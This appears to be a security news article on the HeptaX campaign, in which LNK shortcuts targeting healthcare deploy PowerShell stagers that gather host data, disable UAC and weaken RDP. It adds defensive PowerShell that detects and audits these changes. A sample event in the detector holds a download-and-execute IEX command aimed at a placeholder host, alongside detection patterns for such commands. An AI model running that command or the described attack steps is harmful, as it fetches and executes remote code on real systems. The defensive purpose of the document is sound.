A multi-stage cyberattack campaign that starts from malicious LNK (Windows shortcut) files has been detected, targeting the healthcare sector.
When the LNK file is executed, it launches a PowerShell command that downloads and runs further payloads, including batch (BAT) files and PowerShell scripts, from a remote server.
“The attack involves the creation of an administrative account on the victim’s system and altering Remote Desktop settings to lower authentication requirements, simplifying unauthorized RDP access for the attacker,” Cyble Research and Intelligence Labs (CRIL) shared with Cyber Security News.
Overview Of The Multi-stage Cyberattack Campaign
An unattributed threat group has resurfaced repeatedly over the last 12 months, changing its lure themes while keeping its attack methods unchanged.
The campaign, tracked as HeptaX, relies mainly on PowerShell and batch scripts to take over vulnerable servers.
Initially, the downloaded PowerShell script constructs a base URL that it uses to fetch later-stage payloads and to send back collected information. Its first task is to obtain the compromised system's unique identifier (UID).
Next, the PowerShell script downloads a password-protected lure document from the remote server and opens it. The script's main purpose, however, is to assess the system's User Account Control (UAC) configuration.
It does this through registry checks (the same ones used earlier in the chain) that determine whether UAC is enabled and whether the administrator consent prompt is still active.
Once the connection to the server is established, a new PowerShell script is launched. It contains a number of functions for communicating with the remote server, exfiltrating data and performing system reconnaissance. It collects the following:
- Computer name and username.
- Recently opened files, taken from the directory C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent.
- Network configuration details, using "ipconfig /all".
- The list of users on the machine ("net user").
- Details of the currently logged-in user.
- The local user groups associated with the current user.
- Directories excluded from Windows Defender scanning.
- Installed antivirus products.
- Running processes, using "tasklist".
- Overall system information, using "systeminfo".
All of this data is written to a log file at "C:\Windows\Temp\OneDriveLog\OneDrive.log".
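The following PowerShell is an added example written for this article, not code from Cyble's report: two detections over Windows process-creation telemetry for the behaviour described above, PowerShell launched from a double-clicked shortcut with a download-and-execute command line, and a burst of the reconnaissance commands listed (ipconfig /all, net user, whoami, tasklist, systeminfo) from one parent process. It assumes Security event 4688 with command-line auditing enabled, and the event objects are simplified to the fields TimeCreated, ProcessId, ParentProcessId, ParentProcessName, NewProcessName and CommandLine; the sample events are constructed, and the Defender-exclusion pattern is an assumption about how such a script would read exclusions.

```powershell
# Added example (not code from the Cyble report). Input: simplified 4688 events.

# Detection 1: PowerShell started by Explorer (how a double-clicked .lnk runs it)
# with a download-and-execute style command line.
function Find-ShellLaunchedDownloader {
    param([Parameter(Mandatory)] [object[]] $Events)
    $Events | Where-Object {
        $_.NewProcessName    -match '\\powershell(\.exe)?$' -and
        $_.ParentProcessName -match '\\explorer\.exe$' -and
        $_.CommandLine       -match 'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression'
    }
}

# Detection 2: several distinct host-reconnaissance commands from one parent
# process inside a short window (sliding window over the sorted hits).
function Find-ReconBurst {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowSeconds = 120,
        [int] $Threshold = 4
    )
    # Command-line patterns for the recon steps the report lists
    $reconPatterns = @(
        'ipconfig(\.exe)?\s+/all',
        '\bnet1?(\.exe)?\s+user\b',
        '\bwhoami',
        '\btasklist',
        '\bsysteminfo',
        'Get-MpPreference|Windows Defender\\Exclusions'   # assumption: typical ways to read Defender exclusions
    )
    # Tag each matching event with the first pattern it hits
    $hits = foreach ($e in $Events) {
        foreach ($p in $reconPatterns) {
            if ($e.CommandLine -match $p) {
                [pscustomobject]@{ Time = [datetime]$e.TimeCreated; Parent = $e.ParentProcessId; Pattern = $p; CommandLine = $e.CommandLine }
                break
            }
        }
    }
    foreach ($group in ($hits | Group-Object Parent)) {
        $sorted = @($group.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $end      = $sorted[$i].Time.AddSeconds($WindowSeconds)
            $window   = @($sorted | Where-Object { $_.Time -ge $sorted[$i].Time -and $_.Time -le $end })
            $distinct = @($window.Pattern | Sort-Object -Unique)
            if ($distinct.Count -ge $Threshold) {
                [pscustomobject]@{
                    ParentProcessId    = $group.Name
                    FirstSeen          = $sorted[$i].Time
                    DistinctReconTypes = $distinct.Count
                    Commands           = ($window.CommandLine -join ' ; ')
                }
                break   # one alert per parent process
            }
        }
    }
}

# Constructed sample events (not real telemetry): one shortcut-launched chain and
# one routine tasklist from an administrator's console an hour later.
$t0 = Get-Date '2024-09-16T09:00:00'
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$sample = @(
    [pscustomobject]@{ TimeCreated=$t0;               ProcessId=4120; ParentProcessId=1532; ParentProcessName='C:\Windows\explorer.exe'; NewProcessName=$ps;                                     CommandLine='powershell.exe -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage1'')"' }
    [pscustomobject]@{ TimeCreated=$t0.AddSeconds(4); ProcessId=4180; ParentProcessId=4120; ParentProcessName=$ps;                       NewProcessName='C:\Windows\System32\ipconfig.exe';    CommandLine='ipconfig /all' }
    [pscustomobject]@{ TimeCreated=$t0.AddSeconds(5); ProcessId=4184; ParentProcessId=4120; ParentProcessName=$ps;                       NewProcessName='C:\Windows\System32\net.exe';         CommandLine='net user' }
    [pscustomobject]@{ TimeCreated=$t0.AddSeconds(6); ProcessId=4190; ParentProcessId=4120; ParentProcessName=$ps;                       NewProcessName='C:\Windows\System32\whoami.exe';      CommandLine='whoami /groups' }
    [pscustomobject]@{ TimeCreated=$t0.AddSeconds(7); ProcessId=4196; ParentProcessId=4120; ParentProcessName=$ps;                       NewProcessName='C:\Windows\System32\tasklist.exe';    CommandLine='tasklist' }
    [pscustomobject]@{ TimeCreated=$t0.AddSeconds(9); ProcessId=4202; ParentProcessId=4120; ParentProcessName=$ps;                       NewProcessName='C:\Windows\System32\systeminfo.exe';  CommandLine='systeminfo' }
    [pscustomobject]@{ TimeCreated=$t0.AddHours(1);   ProcessId=7700; ParentProcessId=7012; ParentProcessName='C:\Windows\System32\cmd.exe'; NewProcessName='C:\Windows\System32\tasklist.exe'; CommandLine='tasklist /v' }
)

Find-ShellLaunchedDownloader -Events $sample | Select-Object TimeCreated, ProcessId, CommandLine
Find-ReconBurst -Events $sample | Format-List
```

On a real host, feed the functions objects built from `Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 }` (mapping the event's New Process Name, Creator Process ID and Process Command Line fields to the property names above); without the command-line auditing policy the CommandLine field is empty and both detections are blind. The lone `tasklist /v` in the sample is deliberately not flagged: the burst rule needs several distinct recon types from the same parent, which is what separates this chain from ordinary administration.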
“With all the collected information, User Account Control (UAC) disabled, and a new user account named ‘BootUEFI’ created with administrative privileges, along with lowered authentication requirements for Terminal Services, the TAs can easily gain access to the compromised remote desktop,” researchers said.
Over the past year, this threat group has also been linked to earlier campaigns that used malicious files with names such as:
- SOW_for_Nevrlate.pdf
- WebContentWriting_Handout.pdf
- Blockchain_Trading_Website_Manager.docx
- Project Description – PoC smart assistant Vhyro Project from jvope signature.pdf
- Resume – professional sax, keys and guitar player with over 40 years experience working with own bands, accompanied world stars.pdf
- dropshipping Elien project prposal-soft online service ventilization from xihu.pdf.lnk
The noteworthy file from the current campaign is:
- 202409_Resident_Care_Quality_Improvement_Strategies_for_Nursing_Homes_Enhancing_Patient_Satisfaction_and_Health_Outcomes.pdf.lnk
The variety of file names and themes indicates a broad targeting approach across several industries, suggesting that the group tailors its lures to appeal to a range of victims.
Recommendations
- Use robust email filtering to identify and block malicious attachments.
- Exercise caution with links and attachments in email.
- Consider blocking the execution of shortcut files (.lnk) delivered as email attachments.
- Monitor User Account Control (UAC) settings for changes on a regular basis.
- Harden Remote Desktop Protocol (RDP) by requiring network-level authentication (NLA) and strong authentication such as multi-factor authentication (MFA).
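The audit script below is an added example written for this article, not code from Cyble or from the campaign; it covers both the UAC registry checks described earlier in the chain and the account creation and Terminal Services changes the researchers quote, and it serves the last two recommendations. The registry paths and value names are the documented Windows locations for these settings; the `$ExpectedAdmins` allow-list is a placeholder to replace with the accounts that should hold local administrator rights on the host.

```powershell
# Added example (not Cyble's code): audit the host settings and accounts this
# chain tampers with, and report recent account changes from the Security log.
function Get-HostTamperAudit {
    param(
        [string[]] $ExpectedAdmins = @('Administrator'),   # placeholder allow-list, replace per host
        [int] $LookbackDays = 7
    )
    $findings = @()

    # UAC: EnableLUA 1 = UAC on; ConsentPromptBehaviorAdmin 0 = elevate without prompting.
    $uac  = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $cpba = if ($null -eq $uac.ConsentPromptBehaviorAdmin) { 5 } else { $uac.ConsentPromptBehaviorAdmin }  # absent value: treat as the default (5)
    $findings += [pscustomobject]@{ Check = 'UAC EnableLUA';                   Value = $uac.EnableLUA; Expected = '1';                   Ok = ($uac.EnableLUA -eq 1) }
    $findings += [pscustomobject]@{ Check = 'UAC ConsentPromptBehaviorAdmin';  Value = $cpba;          Expected = 'not 0';               Ok = ($cpba -ne 0) }

    # Terminal Services / RDP: fDenyTSConnections 1 = RDP off; UserAuthentication 1 = NLA required;
    # SecurityLayer 2 = TLS required.
    $ts  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $findings += [pscustomobject]@{ Check = 'RDP fDenyTSConnections';          Value = $ts.fDenyTSConnections;  Expected = '1 unless RDP is required'; Ok = ($ts.fDenyTSConnections -eq 1) }
    $findings += [pscustomobject]@{ Check = 'RDP UserAuthentication (NLA)';    Value = $rdp.UserAuthentication; Expected = '1';                        Ok = ($rdp.UserAuthentication -eq 1) }
    $findings += [pscustomobject]@{ Check = 'RDP SecurityLayer';               Value = $rdp.SecurityLayer;      Expected = '2 (TLS)';                  Ok = ($rdp.SecurityLayer -eq 2) }

    # Local Administrators group members that are not on the allow-list
    # (member names come back as MACHINE\user or DOMAIN\user; keep the account part).
    $admins     = Get-LocalGroupMember -Group 'Administrators' | ForEach-Object { ($_.Name -split '\\')[-1] }
    $unexpected = @($admins | Where-Object { $ExpectedAdmins -notcontains $_ })
    $findings += [pscustomobject]@{ Check = 'Unexpected local administrators'; Value = ($unexpected -join ', '); Expected = 'none'; Ok = ($unexpected.Count -eq 0) }

    # Recent account creations (4720) and additions to local security groups (4732).
    # Requires Account Management auditing; Get-WinEvent returns nothing (no error) when none exist.
    $since  = (Get-Date).AddDays(-$LookbackDays)
    $events = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } -ErrorAction SilentlyContinue)
    $findings += [pscustomobject]@{ Check = "Account created / added to local group in last $LookbackDays days"; Value = $events.Count; Expected = '0, or only change-controlled entries'; Ok = ($events.Count -eq 0) }

    return $findings
}

Get-HostTamperAudit | Format-Table -AutoSize
# Any row with Ok = False deserves a look; a new administrative account plus
# UAC off plus NLA off together match the end state this campaign leaves behind.
```

Run it from an elevated session: reading the Security log needs administrator rights, and `Get-LocalGroupMember` comes from the LocalAccounts module shipped with Windows 10 and Windows Server 2016 and later. The script only reads state; scheduling it and diffing successive outputs is a cheap way to catch the UAC and RDP changes the recommendations ask you to monitor.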